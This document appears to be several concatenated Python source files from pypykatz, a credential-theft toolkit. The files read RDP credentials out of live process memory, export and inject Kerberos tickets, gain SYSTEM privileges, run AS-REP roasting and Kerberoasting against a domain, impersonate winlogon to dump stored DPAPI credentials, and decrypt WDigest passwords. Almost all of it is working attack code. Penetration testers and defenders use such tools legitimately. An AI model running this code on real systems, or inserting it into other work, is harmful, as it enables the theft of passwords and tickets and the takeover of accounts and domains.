from pypykatz.rdp.packages.creds.decryptor import RDPCredentialDecryptorLogonpasswords, RDPCredentialDecryptorMstsc

class RDPCredParser:
	def __init__(self, process, reader, sysinfo, rdp_module, find_first=False, lower_bound=0, upper_bound=-1):
		self.process = process
		self.reader = reader
		self.sysinfo = sysinfo
		self.credentials = []
		self.rdp_module = rdp_module
		self.find_first = find_first
		self.lower_bound = lower_bound
		self.upper_bound = upper_bound
	
	@staticmethod
	def go_live(pid = None, all_rdp = False, live_rdp_module = None):
		if platform.system() != 'Windows':
			raise Exception('Live parsing will only work on Windows')
		from pypykatz.commons.readers.local.common.live_reader_ctypes import OpenProcess, PROCESS_ALL_ACCESS
		from pypykatz.commons.winapi.machine import LiveMachine
		from pypykatz.commons.winapi.constants import PROCESS_VM_READ , PROCESS_VM_WRITE , PROCESS_VM_OPERATION , PROCESS_QUERY_INFORMATION , PROCESS_CREATE_THREAD
		from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege
		from pypykatz.commons.readers.local.live_reader import LiveReader
		from pypykatz.commons.readers.local.process import Process
		req_access_rights = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD

		enable_debug_privilege()
		targets = []

		if pid is not None:
			process = Process(pid=pid, access = req_access_rights )
			process.list_modules()
			reader = LiveReader(process_handle=process.phandle)
			sysinfo = KatzSystemInfo.from_live_reader(reader)
			targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo, live_rdp_module))
			
		else:
			machine = LiveMachine()

			if live_rdp_module == "logonpasswords" and all_rdp is False:
				for service_name, display_name, pid in machine.list_services():
					if service_name == 'TermService':
						process = Process(pid=pid, access = req_access_rights )
						reader = LiveReader(process_handle=process.phandle)
						sysinfo = KatzSystemInfo.from_live_reader(reader)
						targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo, live_rdp_module))

			if live_rdp_module == "mstsc" and all_rdp is False:
				for pid in machine.list_all_pids():
					try:
						process = Process(pid=pid, access = req_access_rights )
						for module in process.list_modules():
							if module.name.lower().find("mstscax.dll") != -1:
								reader = LiveReader(process_handle=process.phandle)
								sysinfo = KatzSystemInfo.from_live_reader(reader)
								targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo, live_rdp_module))
								break
					except Exception as e:
						#import traceback
						#traceback.print_exc()
						pass
					if len(targets):
						break

			if all_rdp is True:
				for pid in machine.list_all_pids():
					try:
						process = Process(pid=pid, access = req_access_rights )
						for module in process.list_modules():
							if module.name.lower().find("mstscax.dll") != -1 or module.name.lower().find("rdpcorets.dll") != -1:
								reader = LiveReader(process_handle=process.phandle)
								sysinfo = KatzSystemInfo.from_live_reader(reader)
								targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo, live_rdp_module))
								break
					except Exception as e:
						#import traceback
						#traceback.print_exc()
						print(e)
		
		for target in targets:
			target.start()
		return targets

	@staticmethod
	def parse_minidump_file(filename, rdp_module, chunksize = 10*1024):
		try:
			minidump = MinidumpFile.parse(filename)
			reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize)
			sysinfo = KatzSystemInfo.from_minidump(minidump)
		except Exception as e:
			logger.exception('Minidump parsing error!')
			raise e
		try:
			mimi = RDPCredParser(None, reader, sysinfo, rdp_module)
			mimi.start()
		except Exception as e:
			logger.info('Credentials parsing error!')
			raise e
		return [mimi]

	def rdpcreds(self):
		if self.rdp_module == "logonpasswords":
			decryptor_template = RDPCredsTemplate.get_logonpasswords_template(self.sysinfo)
			decryptor = RDPCredentialDecryptorLogonpasswords(self.process, self.reader, decryptor_template, self.sysinfo, find_first=self.find_first, lower_bound=self.lower_bound, upper_bound=self.upper_bound)
		else: # mstsc
			decryptor_template = RDPCredsTemplate.get_mstsc_template()
			decryptor = RDPCredentialDecryptorMstsc(self.process, self.reader, decryptor_template, self.sysinfo, find_first=self.find_first)

		decryptor.start()

		for cred in decryptor.credentials:
			self.credentials.append(cred)

	def start(self):
		self.rdpcreds()


import winreg
import ntpath

from pypykatz.commons.readers.local.common.winreg import *

class LiveRegistryHive:
	def __init__(self, hive_name, root = winreg.HKEY_LOCAL_MACHINE):
		self.hive_name = hive_name
		self.root = root
		
	def close(self):
		return

	def setup(self):
		return
		
	def find_key(self, key_path, throw = True):
		if self.root is None:
			self.setup()
		if key_path == '' or key_path is None:
			return self.root
			
		key_path = self.hive_name + '\\' + key_path		
		try:
			key = winreg.OpenKeyEx(self.root, key_path, access= winreg.KEY_READ)
		except Exception as e:
			if throw is True:
				raise e
			else:
				return None
		return key
		
	def enum_key(self, key_path, throw = True):
		if self.root is None:
			self.setup()
		
		#key_path = self.hive_name + '\\' + key_path
		key = self.find_key(key_path, throw)
		names = []
		i = 0
		while True:
			try:
				name = winreg.EnumKey(key, i)
				names.append(name)
				i+= 1
			except OSError as e:
				if isinstance(e, WindowsError) and e.winerror == 259:
					break
				else:
					raise e
				
		return names
		
	def list_values(self, key):
		if self.root is None:
			self.setup()
		
		values = []
		i = 0
		while True:
			try:
				value = winreg.EnumValue(key, i)
				values.append(value[0].encode())
				i+= 1
			except OSError as e:
				if isinstance(e, WindowsError) and e.winerror == 259:
					break
				else:
					raise e
				
		return values
		
	def get_value(self, value_path, throw = True):
		if self.root is None:
			self.setup()
		key_path = ntpath.dirname(value_path)
		value_name = ntpath.basename(value_path)
		if value_name == 'default':
			value_name = ''
		
		key = self.find_key(key_path, throw)
		if key is None:
			return None
			
		res = winreg.QueryValueEx(key, value_name)
		return (res[1], res[0])
		
	def get_class(self, key_path, throw = True):
		if self.root is None:
			self.setup()
			
		pkey = winreg.HKEY_LOCAL_MACHINE
		key_path = self.hive_name + '\\' + key_path
		for name in key_path.split('\\'):
			pkey = RegOpenKey(pkey, name)
	
		ki = RegQueryInfoKey(pkey)		
		return ki[0].decode()
		
	
	



import datetime

from winacl.functions.highlevel import get_logon_info
from msldap.commons.factory import LDAPConnectionFactory
from pypykatz.kerberos.functiondefs.asn1structs import InitialContextToken
from minikerberos.common.utils import TGSTicket2hashcat, TGTTicket2hashcat
from minikerberos.network.clientsocket import KerberosClientSocket
from minikerberos.common.target import KerberosTarget

from minikerberos.security import APREPRoast, Kerberoast
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.target import KerberosTarget
from minikerberos.common.utils import TGSTicket2hashcat
from minikerberos.protocol.asn1_structs import AP_REQ, KRB_CRED, EncKrbCredPart, \
	KRBCRED, Authenticator, KrbCredInfo, EncryptedData, TGS_REQ, AP_REP
from minikerberos.common.utils import print_table
from minikerberos.common.ccache import CCACHE, Credential
from minikerberos.protocol.structures import ChecksumFlags, AuthenticatorChecksum
from minikerberos.protocol.encryption import Key, _enctype_table


from pypykatz import logger
from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
from pypykatz.kerberos.functiondefs.netsecapi import LsaConnectUntrusted, \
	LsaLookupAuthenticationPackage, KERB_PURGE_TKT_CACHE_REQUEST, LsaCallAuthenticationPackage, \
	LsaDeregisterLogonProcess, LsaRegisterLogonProcess, LsaEnumerateLogonSessions, \
	LsaGetLogonSessionData, LsaFreeReturnBuffer, retrieve_tkt_helper, KERB_RETRIEVE_TKT_RESPONSE, \
	get_lsa_error, get_ticket_cache_info_helper, extract_ticket, submit_tkt_helper, \
	AcquireCredentialsHandle, InitializeSecurityContext, SECPKG_CRED, ISC_REQ, SEC_E, \
	SecPkgContext_SessionKey, QueryContextAttributes, SECPKG_ATTR

from pypykatz.kerberos.functiondefs.advapi32 import OpenProcessToken,  GetTokenInformation_tokenstatistics
from pypykatz.kerberos.functiondefs.kernel32 import GetCurrentProcessId, OpenProcess, CloseHandle, MAXIMUM_ALLOWED


class KerberosLive:
	def __init__(self, start_luid = 0, helper_name = 'TOTALLY_NOT_PYPYKATZ'):
		self.available_luids = []
		self.current_luid = start_luid
		self.original_luid = self.get_current_luid()
		self.kerberos_package_id = None
		self.helper_name = helper_name
		self.__lsa_handle = None
		self.__lsa_handle_is_elevated = None
		
		self.get_kerberos_package_id()
		self.list_luids()

	def get_kerberos_package_id(self):
		if self.kerberos_package_id is None:
			lsa_handle = LsaConnectUntrusted()
			self.kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, 'kerberos')
			LsaDeregisterLogonProcess(lsa_handle)

		return self.kerberos_package_id

	def __open_elevated(self):
		if self.__lsa_handle_is_elevated is True:
			return self.__lsa_handle
		
		pm = ProcessManipulator()
		try:
			pm.getsystem()
		except Exception as e:
			raise Exception('Failed to obtain SYSTEM privileges! Are you admin? Error: %s' % e)
		
		self.__lsa_handle = LsaRegisterLogonProcess(self.helper_name)
		pm.dropsystem()
		self.__lsa_handle_is_elevated = True
		return self.__lsa_handle

	def open_lsa_handle(self, luid, req_elevated = False):
		if req_elevated is True:
			if self.__lsa_handle_is_elevated is True:
				return self.__lsa_handle
			return self.__open_elevated()

		
		if luid == 0 or self.original_luid == self.current_luid:
			self.__lsa_handle = LsaConnectUntrusted()
			self.__lsa_handle_is_elevated = False
		else:
			self.__open_elevated()

		return self.__lsa_handle
	
	def switch_luid(self, new_luid):
		self.open_lsa_handle(0, req_elevated=True)
		if new_luid not in self.available_luids:
			if new_luid not in self.list_luids():
				raise Exception('This luid is not known!')

		self.current_luid = new_luid

	#def get_ticket_from_cache(self, luid, targetname):
	#	self.open_lsa_handle(0, req_elevated=True)
	#	ticket_data = None
	#	msg_req_ticket = retrieve_tkt_helper(targetname, logonid = luid)
	#	ret_msg, ret_status, free_prt = LsaCallAuthenticationPackage(self.__lsa_handle, self.kerberos_package_id, msg_req_ticket)
	#	
	#	#print('ret_msg %s' % ret_msg)
	#	#print('ret_status %s' % ret_status)
	#	if ret_status != 0:
	#		raise get_lsa_error(ret_status)
	#	
	#	if len(ret_msg) > 0:
	#		resp = KERB_RETRIEVE_TKT_RESPONSE.from_buffer_copy(ret_msg)
	#		ticket_data = resp.Ticket.get_data()
	#		LsaFreeReturnBuffer(free_prt)
	#
	#	return ticket_data

	def get_ticketinfo(self, luid):
		if luid == 0:
			luid = self.original_luid
		self.open_lsa_handle(luid)
		ticket_infos = {}
		ticket_infos[luid] = []
		for ticket_info in get_ticket_cache_info_helper(self.__lsa_handle, self.kerberos_package_id, luid, throw = False):
			ticket_infos[luid].append(ticket_info)

		return ticket_infos

	def get_all_ticketinfo(self):
		self.open_lsa_handle(0, req_elevated=True)
		ticket_infos = {}
		for luid in self.list_luids():
			if luid not in ticket_infos:
				ticket_infos[luid] = []
			for ticket_info in get_ticket_cache_info_helper(self.__lsa_handle, self.kerberos_package_id, luid, throw = False):
				if ticket_info != []:
					ticket_infos[luid].append(ticket_info)

		return ticket_infos

	def export_ticketdata_target(self, luid, target):
		self.open_lsa_handle(luid)
		return extract_ticket(self.__lsa_handle, self.kerberos_package_id, luid, target)

	def export_ticketdata(self, luid):
		if luid == 0:
			luid = self.original_luid
		ticket_data = {}
		if luid not in ticket_data:
			ticket_data[luid] = []
		
		ticket_infos = self.get_all_ticketinfo()
		for ticket in ticket_infos[luid]:
			res = extract_ticket(self.__lsa_handle, self.kerberos_package_id, luid, ticket['ServerName'])
			ticket_data[luid].append(res)
		
		return ticket_data

	def export_all_ticketdata(self):
		self.open_lsa_handle(0, req_elevated=True)
		ticket_infos = self.get_all_ticketinfo()
		ticket_data = {}
		for luid in ticket_infos:
			if luid not in ticket_data:
				ticket_data[luid] = []
			
			for ticket in ticket_infos[luid]:
				res = extract_ticket(self.__lsa_handle, self.kerberos_package_id, luid, ticket['ServerName'])
				ticket_data[luid].append(res)
		return ticket_data

	def get_current_luid(self):
		current_pid = GetCurrentProcessId()
		process_handle = OpenProcess(MAXIMUM_ALLOWED, False, current_pid)
		token_handle = OpenProcessToken(process_handle)
		stats = GetTokenInformation_tokenstatistics(token_handle)
		CloseHandle(process_handle)
		return stats['AuthenticationId']

	def list_luids(self):
		self.available_luids = LsaEnumerateLogonSessions()
		return self.available_luids

	def list_sessions(self):
		for luid in self.available_luids:
			try:
				session_info = LsaGetLogonSessionData(luid)
				print('USER "%s\\%s" SPN "%s" LUID %s' % (session_info.get('LogonDomain', '.'), session_info['UserName'], session_info['Upn'], hex(session_info['LogonId'])))
			except Exception as e:
				logger.debug('Failed to get info for LUID %s Reason: %s' % (luid, e ))
				continue

	def purge(self, luid = None):
		luids = []
		if luid is None:
			self.open_lsa_handle(0, req_elevated=True)
			luids += self.list_luids()
		else:
			luids.append(luid)
			self.open_lsa_handle(luid)
		
		for luid_current in luids:
			message = KERB_PURGE_TKT_CACHE_REQUEST(luid_current)
			message_ret, status_ret, free_ptr = LsaCallAuthenticationPackage(self.__lsa_handle, self.kerberos_package_id, message)
			if status_ret != 0:
				if len(luids) > 1:
					continue
				raise get_lsa_error(status_ret)
			if len(message_ret) > 0:
				LsaFreeReturnBuffer(free_ptr)

	def submit_ticket(self, ticket_data, luid = 0):
		self.open_lsa_handle(luid)
		message = submit_tkt_helper(ticket_data, logonid=luid)
		ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage(self.__lsa_handle, self.kerberos_package_id, message)
		if ret_status != 0:
			raise get_lsa_error(ret_status)

		if len(ret_msg) > 0:
			LsaFreeReturnBuffer(free_ptr)

	def get_tgt(self, target = None):
		if target is None:
			logon = get_logon_info()
			if logon['logonserver'] is None:
				raise Exception('Failed to get logonserver and no target was specified! This wont work.')
			target = 'cifs/%s' % logon['logonserver']

		ctx = AcquireCredentialsHandle(None, 'kerberos', target, SECPKG_CRED.OUTBOUND)
		res, ctx, data, outputflags, expiry = InitializeSecurityContext(
			ctx, 
			target, 
			token = None, 
			ctx = ctx, 
			flags = ISC_REQ.DELEGATE | ISC_REQ.MUTUAL_AUTH | ISC_REQ.ALLOCATE_MEMORY
		)
		
		
		if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
			#key_data = sspi._get_session_key()
			raw_ticket = self.export_ticketdata_target(0, target)
			key = Key(raw_ticket['Key']['KeyType'], raw_ticket['Key']['Key'])
			token = InitialContextToken.load(data[0][1])
			ticket = AP_REQ(token.native['innerContextToken']).native
			cipher = _enctype_table[ticket['authenticator']['etype']]
			dec_authenticator = cipher.decrypt(key, 11, ticket['authenticator']['cipher'])
			authenticator = Authenticator.load(dec_authenticator).native
			if authenticator['cksum']['cksumtype'] != 0x8003:
				raise Exception('Checksum not good :(')
			
			checksum_data = AuthenticatorChecksum.from_bytes(authenticator['cksum']['checksum'])
			if ChecksumFlags.GSS_C_DELEG_FLAG not in checksum_data.flags:
				raise Exception('delegation flag not set!')

			cred_orig = KRB_CRED.load(checksum_data.delegation_data).native
			dec_authenticator = cipher.decrypt(key, 14, cred_orig['enc-part']['cipher'])
			#info = EncKrbCredPart.load(dec_authenticator).native

			#reconstructing kirbi with the unencrypted data
			te = {}
			te['etype'] = 0
			te['cipher'] = dec_authenticator
			ten = EncryptedData(te)

			t = {}
			t['pvno'] = cred_orig['pvno']
			t['msg-type'] = cred_orig['msg-type']
			t['tickets'] = cred_orig['tickets']
			t['enc-part'] = ten

			cred = KRB_CRED(t)
			return cred.dump()

	def get_apreq(self, target):
		ctx = AcquireCredentialsHandle(None, 'kerberos', target, SECPKG_CRED.OUTBOUND)
		res, ctx, data, outputflags, expiry = InitializeSecurityContext(
			ctx,
			target,
			token = None,
			ctx = ctx,
			flags = ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION
		)
		if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
			sec_struct = SecPkgContext_SessionKey()
			QueryContextAttributes(ctx, SECPKG_ATTR.SESSION_KEY, sec_struct)
			key_data = sec_struct.Buffer
			#print(data[0][1].hex())
			
			ticket = InitialContextToken.load(data[0][1]).native['innerContextToken']
			return AP_REQ(ticket), key_data


async def live_roast(outfile = None):
	try:
		logon = get_logon_info()
		domain = logon['domain']
		url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
		msldap_url = LDAPConnectionFactory.from_url(url)
		client = msldap_url.get_client()
		_, err = await client.connect()
		if err is not None:
			raise err

		domain = client._ldapinfo.distinguishedName.replace('DC=','').replace(',','.')
		spn_users = []
		asrep_users = []
		errors = []
		results = []
		final_results = []
		spn_cnt = 0
		asrep_cnt = 0
		async for user, err in client.get_all_knoreq_users():
			if err is not None:
				raise err
			cred = KerberosCredential()
			cred.username = user.sAMAccountName
			cred.domain = domain
			
			asrep_users.append(cred)
		async for user, err in client.get_all_service_users():
			if err is not None:
				raise err
			cred = KerberosCredential()
			cred.username = user.sAMAccountName
			cred.domain = domain
			
			spn_users.append(cred)
			
		for cred in asrep_users:
			results = []
			ks = KerberosTarget(domain)
			ar = APREPRoast(ks)
			res = await ar.run(cred, override_etype = [23])
			results.append(res)	
		
		if outfile is not None:
			filename = outfile + 'asreproast_%s_%s.txt' % (logon['domain'], datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
			with open(filename, 'w', newline = '') as f:
					for thash in results:
						asrep_cnt += 1
						f.write(thash + '\r\n')
		else:
			final_results += results

		results = []
		for cred in spn_users:
			spn_name = '%s@%s' % (cred.username, cred.domain)
			if spn_name[:6] == 'krbtgt':
				continue
			try:
				ctx = AcquireCredentialsHandle(None, 'kerberos', spn_name, SECPKG_CRED.OUTBOUND)
				res, ctx, data, outputflags, expiry = InitializeSecurityContext(
					ctx,
					spn_name,
					token = None,
					ctx = ctx,
					flags = ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION
				)
				if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:					
					ticket = InitialContextToken.load(data[0][1]).native['innerContextToken']
				else:
					raise Exception('Error %s' % res.value)
			except Exception as e:
				print(e)
				errors.append((spn_name, e))
				continue
			results.append(TGSTicket2hashcat(ticket))
		
		if outfile is not None:
			filename = outfile+ 'spnroast_%s_%s.txt' % (logon['domain'], datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
			with open(filename, 'w', newline = '') as f:
				for thash in results:
					spn_cnt += 1
					f.write(thash + '\r\n')
		
		else:
			final_results += results

		return final_results, errors, None

	except Exception as e:
		return None, None, e


if __name__ == '__main__':
	import glob
	import sys

	kl = KerberosLive()
	kl.purge(0)
	#x = kl.get_all_ticketdata()
	#ctr = 0
	#for luid in x:
	#	if x[luid] != []:
	#		for ticket in x[luid]:
	#			ctr += 1
	#			with open('test_%s.kirbi' % ctr, 'wb') as f:
	#				f.write(ticket['Ticket'])
	#
	#print(x)
	#sys.exit()
	for filename in glob.glob('*.kirbi'):
		with open(filename, 'rb') as d:
			ticket = d.read()
			try:
				kl.submit_ticket(ticket)
				print('OK')
			except Exception as e:
				print(e)
			input()


# Thank you!
# https://www.tiraniddo.dev/2021/05/dumping-stored-credentials-with.html

import tempfile
import os

from pypykatz import logger
from pypykatz.commons.winapi.local.function_defs.advapi32 import CredBackupCredentials
from pypykatz.commons.readers.local.process import Process, PROCESS_QUERY_LIMITED_INFORMATION
from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege, RtlAdjustPrivilege
from pypykatz.commons.winapi.local.function_defs.advapi32 import SetThreadToken
from pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData
from pypykatz.dpapi.structures.credentialfile import CREDENTIAL_BLOB, CredentialFile


def dpapi_trustedcredman(target_pid, special_process = 'winlogon.exe', temp_file_path = None):
    dec_data = None
    try:
        if temp_file_path is None:
            tf = tempfile.NamedTemporaryFile(delete=False)
            temp_file_path = tf.name 
            logger.debug('Temp file path: %s' % temp_file_path)
            tf.close()

        enable_debug_privilege()

        ### opening winlogon and duplicating token, impersonating it, enabling SeTrustedCredmanAccessPrivilege
        pwinlogon = Process(name = special_process, access = PROCESS_QUERY_LIMITED_INFORMATION, open = True)
        winlogon_token = pwinlogon.duplicate_token()
        SetThreadToken(winlogon_token)
        RtlAdjustPrivilege(31, thread_or_process=True) #SeTrustedCredmanAccessPrivilege = 31
        
        
        ### opening target process, getting handle on its token
        puserprocess = Process(pid=target_pid, access = PROCESS_QUERY_LIMITED_INFORMATION, open = True)
        puserprocess_token = puserprocess.get_process_token()

        ### magic happens here
        CredBackupCredentials(puserprocess_token, temp_file_path)

        ### opening encrypted cerentials file and decrypting it
        with open(temp_file_path, 'rb') as f:
            dec_data = CryptUnprotectData(f.read())


        ### parsing decrypted credfile
        results = []
        xf = CredentialFile.from_bytes(dec_data)
        blobsdata = xf.data
        if xf.unk == 2:
            res = CREDENTIAL_BLOB.from_bytes(blobsdata)
            results.append(res)
            blobsdata = blobsdata[res.size:]
            while len(blobsdata) > 0:
                res = CREDENTIAL_BLOB.from_bytes(blobsdata)
                results.append(res)
                blobsdata = blobsdata[res.size:]

        return dec_data, results, None
    except Exception as e:        
        logger.debug('dpapi_trustedcredman err! %s' % e)
        return dec_data, None, e
    finally:
        try:
            os.unlink(temp_file_path)
            logger.debug('Temp file removed')
        except Exception as e:
            logger.debug('Failed to remove temp file! %s' % str(e))
            pass


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
import json

from pypykatz.lsadecryptor.package_commons import PackageDecryptor
from pypykatz.commons.win_datatypes import LSA_UNICODE_STRING

class WdigestCredential:
	def __init__(self):
		self.credtype = 'wdigest'
		self.username = None
		self.domainname = None
		self.password = None
		self.password_raw = b''
		self.luid = None
	
	def to_dict(self):
		t = {}
		t['credtype'] = self.credtype
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['password'] = self.password
		t['password_raw'] = self.password_raw
		t['luid'] = self.luid
		return t
	def to_json(self):
		return json.dumps(self.to_dict())
		
	def __str__(self):
		t = '\t== WDIGEST [%x]==\n' % self.luid
		t += '\t\tusername %s\n' % self.username
		t += '\t\tdomainname %s\n' % self.domainname
		t += '\t\tpassword %s\n' % self.password
		t += '\t\tpassword (hex)%s\n' % self.password_raw.hex()
		return t
		
class WdigestDecryptor(PackageDecryptor):
	def __init__(self, reader, decryptor_template, lsa_decryptor, sysinfo):
		super().__init__('Wdigest', lsa_decryptor, sysinfo, reader)
		self.decryptor_template = decryptor_template
		self.credentials = []

	def find_first_entry(self):
		position = self.find_signature('wdigest.dll',self.decryptor_template.signature)
		ptr_entry_loc = self.reader.get_ptr_with_offset(position + self.decryptor_template.first_entry_offset)
		ptr_entry = self.reader.get_ptr(ptr_entry_loc)
		return ptr_entry, ptr_entry_loc
		
	def add_entry(self, wdigest_entry):
		"""
		Changed the wdigest parsing, the struct only contains the pointers in the linked list, the actual data is read by 
		adding an offset to the current entry's position
		"""
		wc = WdigestCredential()
		wc.luid = wdigest_entry.luid
		
		#input(wdigest_entry.this_entry.value)
		self.reader.move(wdigest_entry.this_entry.value + self.decryptor_template.primary_offset)
		UserName = LSA_UNICODE_STRING(self.reader)
		DomainName = LSA_UNICODE_STRING(self.reader)
		Password = LSA_UNICODE_STRING(self.reader)

		wc.username = UserName.read_string(self.reader)
		wc.domainname = DomainName.read_string(self.reader)
		wc.encrypted_password = Password.read_maxdata(self.reader)
		if wc.username.endswith('$') is True:
			wc.password, wc.password_raw = self.decrypt_password(wc.encrypted_password, bytes_expected=True)
			if wc.password is not None:
				wc.password = wc.password.hex()
		else:
			wc.password, wc.password_raw = self.decrypt_password(wc.encrypted_password)

		if wc.username == '' and wc.domainname == '' and wc.password is None:
			return
		
		self.credentials.append(wc)
	
	def start(self):
		try:
			entry_ptr_value, entry_ptr_loc = self.find_first_entry()
		except Exception as e:
			self.log('Failed to find Wdigest structs! Reason: %s' % e)
			return
		self.reader.move(entry_ptr_loc)
		entry_ptr = self.decryptor_template.list_entry(self.reader)
		self.walk_list(entry_ptr, self.add_entry)